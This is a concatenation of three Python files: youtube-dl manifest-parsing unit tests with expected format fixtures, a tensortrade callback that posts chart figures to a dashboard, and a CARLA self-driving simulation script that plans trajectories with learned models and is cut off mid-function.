'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/2/pv/1/flavorId/0_sa2ntrdg/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': 'audio-English',
'protocol': 'm3u8',
'language': 'eng',
'vcodec': 'none',
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/2/pv/1/flavorId/0_r7y0nitg/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': 'audio-Undefined',
'protocol': 'm3u8',
'language': 'und',
'vcodec': 'none',
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/2/pv/1/flavorId/0_qlk9hlzr/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': '155',
'protocol': 'm3u8',
'tbr': 155.648,
'width': 320,
'height': 180,
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/2/pv/1/flavorId/0_oefackmi/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': '502',
'protocol': 'm3u8',
'tbr': 502.784,
'width': 480,
'height': 270,
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/12/pv/1/flavorId/0_vyg9pj7k/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': '827',
'protocol': 'm3u8',
'tbr': 827.392,
'width': 640,
'height': 360,
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/12/pv/1/flavorId/0_50n4psvx/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': '1396',
'protocol': 'm3u8',
'tbr': 1396.736,
'width': 854,
'height': 480,
}]
),
(
# http://www.twitch.tv/riotgames/v/6528877
'twitch_vod',
'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
[{
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/audio_only/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Audio Only',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 182.725,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/mobile/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Mobile',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.42C00D',
'tbr': 280.474,
'width': 400,
'height': 226,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/low/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Low',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.42C01E',
'tbr': 628.347,
'width': 640,
'height': 360,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/medium/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Medium',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.42C01E',
'tbr': 893.387,
'width': 852,
'height': 480,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/high/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'High',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.42C01F',
'tbr': 1603.789,
'width': 1280,
'height': 720,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/chunked/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Source',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.100.31',
'tbr': 3214.134,
'width': 1280,
'height': 720,
}]
),
(
# http://www.vidio.com/watch/165683-dj_ambred-booyah-live-2015
# EXT-X-STREAM-INF tag with NAME attribute that is not defined
# in HLS specification
'vidio',
'https://www.vidio.com/videos/165683/playlist.m3u8',
[{
'url': 'https://cdn1-a.production.vidio.static6.com/uploads/165683/dj_ambred-4383-b300.mp4.m3u8',
'manifest_url': 'https://www.vidio.com/videos/165683/playlist.m3u8',
'ext': 'mp4',
'format_id': '270p 3G',
'protocol': 'm3u8',
'tbr': 300,
'width': 480,
'height': 270,
}, {
'url': 'https://cdn1-a.production.vidio.static6.com/uploads/165683/dj_ambred-4383-b600.mp4.m3u8',
'manifest_url': 'https://www.vidio.com/videos/165683/playlist.m3u8',
'ext': 'mp4',
'format_id': '360p SD',
'protocol': 'm3u8',
'tbr': 600,
'width': 640,
'height': 360,
}, {
'url': 'https://cdn1-a.production.vidio.static6.com/uploads/165683/dj_ambred-4383-b1200.mp4.m3u8',
'manifest_url': 'https://www.vidio.com/videos/165683/playlist.m3u8',
'ext': 'mp4',
'format_id': '720p HD',
'protocol': 'm3u8',
'tbr': 1200,
'width': 1280,
'height': 720,
}]
),
(
# https://github.com/ytdl-org/youtube-dl/issues/18923
# https://www.ted.com/talks/boris_hesser_a_grassroots_healthcare_revolution_in_africa
'ted_18923',
'http://hls.ted.com/talks/31241.m3u8',
[{
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/audio/600k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '600k-Audio',
'vcodec': 'none',
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/audio/600k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '68',
'vcodec': 'none',
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/64k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '163',
'acodec': 'none',
'width': 320,
'height': 180,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/180k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '481',
'acodec': 'none',
'width': 512,
'height': 288,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/320k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '769',
'acodec': 'none',
'width': 512,
'height': 288,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/450k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '984',
'acodec': 'none',
'width': 512,
'height': 288,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/600k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '1255',
'acodec': 'none',
'width': 640,
'height': 360,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/950k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '1693',
'acodec': 'none',
'width': 853,
'height': 480,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/1500k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '2462',
'acodec': 'none',
'width': 1280,
'height': 720,
}]
),
]
for m3u8_file, m3u8_url, expected_formats in _TEST_CASES:
with io.open('./test/testdata/m3u8/%s.m3u8' % m3u8_file,
mode='r', encoding='utf-8') as f:
formats = self.ie._parse_m3u8_formats(
f.read(), m3u8_url, ext='mp4')
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
def test_parse_mpd_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/13919
# Also tests duplicate representation ids, see
# https://github.com/ytdl-org/youtube-dl/issues/15111
'float_duration',
'http://unknown/manifest.mpd', # mpd_url
None, # mpd_base_url
[{
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'm4a',
'format_id': '318597',
'format_note': 'DASH audio',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 61.587,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '318597',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.42001f',
'tbr': 318.597,
'width': 340,
'height': 192,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '638590',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.42001f',
'tbr': 638.59,
'width': 512,
'height': 288,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '1022565',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 1022.565,
'width': 688,
'height': 384,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '2046506',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 2046.506,
'width': 1024,
'height': 576,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '3998017',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.640029',
'tbr': 3998.017,
'width': 1280,
'height': 720,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '5997485',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.640032',
'tbr': 5997.485,
'width': 1920,
'height': 1080,
}]
), (
# https://github.com/ytdl-org/youtube-dl/pull/14844
'urls_only',
'http://unknown/manifest.mpd', # mpd_url
None, # mpd_base_url
[{
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_144p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 200,
'width': 256,
'height': 144,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_240p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 400,
'width': 424,
'height': 240,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_360p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 800,
'width': 640,
'height': 360,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_480p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 1200,
'width': 856,
'height': 480,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_576p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 1600,
'width': 1024,
'height': 576,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_720p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 2400,
'width': 1280,
'height': 720,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_1080p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 4400,
'width': 1920,
'height': 1080,
}]
), (
# https://github.com/ytdl-org/youtube-dl/issues/20346
# Media considered unfragmented even though it contains
# Initialization tag
'unfragmented',
'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd', # mpd_url
'https://v.redd.it/hw1x7rcg7zl21', # mpd_base_url
[{
'url': 'https://v.redd.it/hw1x7rcg7zl21/audio',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'm4a',
'format_id': 'AUDIO-1',
'format_note': 'DASH audio',
'container': 'm4a_dash',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 129.87,
'asr': 48000,
}, {
'url': 'https://v.redd.it/hw1x7rcg7zl21/DASH_240',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'mp4',
'format_id': 'VIDEO-2',
'format_note': 'DASH video',
'container': 'mp4_dash',
'acodec': 'none',
'vcodec': 'avc1.4d401e',
'tbr': 608.0,
'width': 240,
'height': 240,
'fps': 30,
}, {
'url': 'https://v.redd.it/hw1x7rcg7zl21/DASH_360',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'mp4',
'format_id': 'VIDEO-1',
'format_note': 'DASH video',
'container': 'mp4_dash',
'acodec': 'none',
'vcodec': 'avc1.4d401e',
'tbr': 804.261,
'width': 360,
'height': 360,
'fps': 30,
}]
)
]
for mpd_file, mpd_url, mpd_base_url, expected_formats in _TEST_CASES:
with io.open('./test/testdata/mpd/%s.mpd' % mpd_file,
mode='r', encoding='utf-8') as f:
formats = self.ie._parse_mpd_formats(
compat_etree_fromstring(f.read().encode('utf-8')),
mpd_base_url=mpd_base_url, mpd_url=mpd_url)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
def test_parse_f4m_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/14660
'custom_base_url',
'http://api.new.livestream.com/accounts/6115179/events/6764928/videos/144884262.f4m',
[{
'manifest_url': 'http://api.new.livestream.com/accounts/6115179/events/6764928/videos/144884262.f4m',
'ext': 'flv',
'format_id': '2148',
'protocol': 'f4m',
'tbr': 2148,
'width': 1280,
'height': 720,
}]
),
]
for f4m_file, f4m_url, expected_formats in _TEST_CASES:
with io.open('./test/testdata/f4m/%s.f4m' % f4m_file,
mode='r', encoding='utf-8') as f:
formats = self.ie._parse_f4m_formats(
compat_etree_fromstring(f.read().encode('utf-8')),
f4m_url, None)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
def test_parse_xspf(self):
_TEST_CASES = [
(
'foo_xspf',
'https://example.org/src/foo_xspf.xspf',
[{
'id': 'foo_xspf',
'title': 'Pandemonium',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 202.416,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/src/cd1/track%201.mp3',
}],
}, {
'id': 'foo_xspf',
'title': 'Final Cartridge (Nichico Twelve Remix)',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 255.857,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/%E3%83%88%E3%83%A9%E3%83%83%E3%82%AF%E3%80%80%EF%BC%92.mp3',
}],
}, {
'id': 'foo_xspf',
'title': 'Rebuilding Nightingale',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 287.915,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/src/track3.mp3',
}, {
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.com/track3.mp3',
}]
}]
),
]
for xspf_file, xspf_url, expected_entries in _TEST_CASES:
with io.open('./test/testdata/xspf/%s.xspf' % xspf_file,
mode='r', encoding='utf-8') as f:
entries = self.ie._parse_xspf(
compat_etree_fromstring(f.read().encode('utf-8')),
xspf_file, xspf_url=xspf_url, xspf_base_url=xspf_url)
expect_value(self, entries, expected_entries, None)
for i in range(len(entries)):
expect_dict(self, entries[i], expected_entries[i])
def test_response_with_expected_status_returns_content(self):
# Checks for mitigations against the effects of
# <https://bugs.python.org/issue15002> that affect Python 3.4.1+, which
# manifest as `_download_webpage`, `_download_xml`, `_download_json`,
# or the underlying `_download_webpage_handle` returning no content
# when a response matches `expected_status`.
httpd = compat_http_server.HTTPServer(
('127.0.0.1', 0), InfoExtractorTestRequestHandler)
port = http_server_port(httpd)
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.daemon = True
server_thread.start()
(content, urlh) = self.ie._download_webpage_handle(
'http://127.0.0.1:%d/teapot' % port, None,
expected_status=TEAPOT_RESPONSE_STATUS)
self.assertEqual(content, TEAPOT_RESPONSE_BODY)
if __name__ == '__main__':
unittest.main()
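# Note (editor's sketch): the cases above read their fixtures from ./test/testdata/{mpd,f4m,xspf}/
# and the expected_status test spins up a local HTTP server, so no network access is required.
# Assuming this module lives in the youtube-dl repository's test/ directory (e.g. as
# test_InfoExtractor.py), it can be run on its own with `python -m unittest` from the repo root.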
|
callbacks.py
|
from abc import abstractmethod
import requests
from tensortrade.env.default.renderers import PlotlyTradingChart
import threading
from tensortrade.core.component import Component
from tensortrade.core.base import TimeIndexed
from tensortrade.env.generic import EpisodeCallback
import time
class LoggingCallback(EpisodeCallback):
def __init__(self, host: str, plotly_renderer: PlotlyTradingChart):
self.host = host
self.plotly_renderer = plotly_renderer
self._fig = None
thr = threading.Thread(target=self.update, args=(), daemon=True)
thr.start()
def update(self):
while True:
try:
requests.post(f'{self.host}/update-fig', json=self._fig)
except Exception as ex:
print(f'Error: {ex}')
time.sleep(5)
def on_done(self, env: 'TradingEnv') -> None:
self.plotly_renderer.render(env)
self._fig = self.plotly_renderer.fig.to_json()
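# A minimal wiring sketch (hedged: `create_env` and the dashboard endpoint are placeholders, not
# part of this module). The callback keeps a daemon thread that re-posts the latest Plotly figure
# JSON to `<host>/update-fig` every 5 seconds, while `on_done` refreshes that figure once per
# episode, so an external dashboard only has to accept the POSTed JSON:
#
#     renderer = PlotlyTradingChart(display=False)
#     callback = LoggingCallback(host='http://localhost:8050', plotly_renderer=renderer)
#     env = create_env(renderer=renderer, episode_callback=callback)  # hypothetical factory
#     # ... run the training loop; the dashboard receives the figure out of band.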
|
run_ours.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from os.path import join, dirname
sys.path.insert(0, join(dirname(__file__), '../../'))
import simulator
simulator.load('/home/wang/CARLA_0.9.9.4')
import carla
sys.path.append('/home/wang/CARLA_0.9.9.4/PythonAPI/carla')
from agents.navigation.basic_agent import BasicAgent
from simulator import config, set_weather, add_vehicle
from simulator.sensor_manager import SensorManager
from utils.navigator_sim import get_map, get_nav, replan, close2dest
from utils import add_alpha_channel
from controller import CapacController, getActorState
import os
import cv2
import time
import copy
import threading
import random
import argparse
import numpy as np
from PIL import Image
from datetime import datetime
import matplotlib.pyplot as plt
plt.rcParams.update({'figure.max_open_warning': 0})
plt.ion()
import torch
from torch.autograd import grad
import torchvision.transforms as transforms
from learning.model import Generator, EncoderWithV
global_img = None
global_nav = None
global_v0 = 0.
global_vel = 0.
global_plan_time = 0.
global_trajectory = None
start_control = False
global_vehicle = None
global_plan_map = None
global_transform = None
max_steer_angle = 0.
global_view_img = None
state0 = None
global_collision = False
global_cnt = 0
MAX_SPEED = 30
img_height = 200
img_width = 400
speed_list = []
random.seed(datetime.now())
torch.manual_seed(999)
torch.cuda.manual_seed(999)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
parser = argparse.ArgumentParser(description='Params')
parser.add_argument('-d', '--data', type=int, default=1, help='data index')
parser.add_argument('-s', '--save', action='store_true', help='save result')  # store_true instead of type=bool, which would treat any non-empty string as True
parser.add_argument('--width', type=int, default=400, help='image width')
parser.add_argument('--height', type=int, default=200, help='image height')
parser.add_argument('--max_dist', type=float, default=25., help='max distance')
parser.add_argument('--max_t', type=float, default=3., help='max time')
parser.add_argument('--vector_dim', type=int, default=64, help='vector dim')
parser.add_argument('--max_speed', type=float, default=10., help='max speed')
parser.add_argument('--scale', type=float, default=25., help='longitudinal length')
parser.add_argument('--dt', type=float, default=0.05, help='discretization minimum time interval')
parser.add_argument('--rnn_steps', type=int, default=10, help='rnn readout steps')
args = parser.parse_args()
data_index = args.data
save_path = '/media/wang/DATASET/CARLA/town01/'+str(data_index)+'/'
encoder = EncoderWithV(input_dim=6, out_dim=args.vector_dim).to(device)
encoder.load_state_dict(torch.load('encoder.pth'))
encoder.eval()
generator = Generator(input_dim=1+1+args.vector_dim, output=2).to(device)
generator.load_state_dict(torch.load('generator.pth'))
generator.eval()
img_transforms = [
transforms.Resize((img_height, img_width)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
img_trans = transforms.Compose(img_transforms)
def mkdir(path):
os.makedirs(save_path+path, exist_ok=True)
def image_callback(data):
global state0, global_img, global_plan_time, global_vehicle, global_plan_map,global_nav, global_transform, global_v0
global_plan_time = time.time()
global_transform = global_vehicle.get_transform()
state0 = getActorState('odom', global_plan_time, global_vehicle)
state0.x = global_transform.location.x
state0.y = global_transform.location.y
state0.z = global_transform.location.z
state0.theta = np.deg2rad(global_transform.rotation.yaw)
array = np.frombuffer(data.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (data.height, data.width, 4)) # RGBA format
global_img = array
global_nav = get_nav(global_vehicle, global_plan_map)
v = global_vehicle.get_velocity()
global_v0 = np.sqrt(v.x**2+v.y**2)
def view_image_callback(data):
global global_view_img
array = np.frombuffer(data.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (data.height, data.width, 4)) # RGBA format
global_view_img = array
def collision_callback(data):
global global_collision
global_collision = True
def visualize(input_img, nav):
global global_vel, global_cnt
global_cnt += 1
img = copy.deepcopy(input_img)
text = "speed: "+str(round(3.6*global_vel, 1))+' km/h'
cv2.putText(img, text, (20, 30), cv2.FONT_HERSHEY_PLAIN, 2.0, (255, 255, 255), 2)
new_nav = add_alpha_channel(nav)
new_nav = cv2.flip(new_nav, 1)
img[:nav.shape[0],-nav.shape[1]:] = new_nav
# if global_cnt % 2 == 0: cv2.imwrite('video/ours/WetCloudySunset/'+str(global_cnt)+'.png', copy.deepcopy(img))
cv2.imshow('Visualization', img)
cv2.waitKey(5)
def get_traj(plan_time, global_img, global_nav):
global global_v0, draw_cost_map, state0, global_vehicle
t = torch.arange(0, 0.99, args.dt).unsqueeze(1).to(device)
t.requires_grad = True
points_num = len(t)
v = global_v0 if global_v0 > 4 else 4
v_0 = torch.FloatTensor([v/args.max_speed]).unsqueeze(1)
v_0 = v_0.to(device)
condition = torch.FloatTensor([v/args.max_speed]*points_num).view(-1, 1)
condition = condition.to(device)
img = Image.fromarray(cv2.cvtColor(global_img,cv2.COLOR_BGR2RGB))
nav = Image.fromarray(cv2.cvtColor(global_nav,cv2.COLOR_BGR2RGB))
img = img_trans(img)
nav = img_trans(nav)
input_img = torch.cat((img, nav), 0).unsqueeze(0).to(device)
single_latent = encoder(input_img, v_0)
single_latent = single_latent.unsqueeze(1)
latent = single_latent.expand(1, points_num, single_latent.shape[-1])
latent = latent.reshape(1 * points_num, single_latent.shape[-1])
output = generator(condition, latent, t)
vx = grad(output[:,0].sum(), t, create_graph=True)[0][:,0]*(args.max_dist/args.max_t)
vy = grad(output[:,1].sum(), t, create_graph=True)[0][:,0]*(args.max_dist/args.max_t)
ax = grad(vx.sum(), t, create_graph=True)[0][:,0]/args.max_t
ay = grad(vy.sum(), t, create_graph=True)[0][:,0]/args.max_t
output_axy = torch.cat([ax.unsqueeze(1), ay.unsqueeze(1)], dim=1)
x = output[:,0]*args.max_dist
y = output[:,1]*args.max_dist
theta_a = torch.atan2(ay, ax)
theta_v = torch.atan2(vy, vx)
sign = torch.sign(torch.cos(theta_a-theta_v))
a = torch.mul(torch.norm(output_axy, dim=1), sign.flatten()).unsqueeze(1)
vx = vx.data.cpu().numpy()
vy = vy.data.cpu().numpy()
x = x.data.cpu().numpy()
y = y.data.cpu().numpy()
ax = ax.data.cpu().numpy()
ay = ay.data.cpu().numpy()
a = a.data.cpu().numpy()
trajectory = {'time':plan_time, 'x':x, 'y':y, 'vx':vx, 'vy':vy, 'ax':ax, 'ay':ay, 'a':a}
return trajectory
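# Note on get_traj(): the generator only predicts normalized positions (x, y) on a time grid
# t in [0, 0.99) with step args.dt. Velocities and accelerations are not predicted directly but
# recovered with torch.autograd.grad by differentiating the outputs w.r.t. t (hence
# t.requires_grad = True), then rescaled by args.max_dist / args.max_t. The signed scalar
# acceleration `a` takes its sign from the angle between the velocity and acceleration vectors,
# so braking shows up as a negative value.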
def make_plan():
global global_img, global_nav, global_pcd, global_plan_time, global_trajectory,start_control
while True:
global_trajectory = get_traj(global_plan_time, global_img, global_nav)
if not start_control:
start_control = True
def main():
global global_nav, global_vel, start_control, global_plan_map, global_vehicle, global_transform, max_steer_angle, global_a, state0, global_collision, global_view_img
client = carla.Client(config['host'], config['port'])
client.set_timeout(config['timeout'])
world = client.load_world('Town01')
weather = carla.WeatherParameters(
cloudiness= 0,
precipitation=0,
sun_altitude_angle= 45,
fog_density = 100,
fog_distance = 0,
fog_falloff = 0,
)
set_weather(world, weather)
# world.set_weather(carla.WeatherParameters.HardRainSunset)
# world.set_weather(carla.WeatherParameters.WetCloudySunset)
# world.set_weather(carla.WeatherParameters.ClearNoon)
blueprint = world.get_blueprint_library()
world_map = world.get_map()
vehicle = add_vehicle(world, blueprint, vehicle_type='vehicle.audi.a2')
global_vehicle = vehicle
# Enables or disables the simulation of physics on this actor.
vehicle.set_simulate_physics(True)
physics_control = vehicle.get_physics_control()
max_steer_angle = np.deg2rad(physics_control.wheels[0].max_steer_angle)
spawn_points = world_map.get_spawn_points()
waypoint_tuple_list = world_map.get_topology()
origin_map = get_map(waypoint_tuple_list)
agent = BasicAgent(vehicle, target_speed=MAX_SPEED)
# prepare map
destination = carla.Transform()
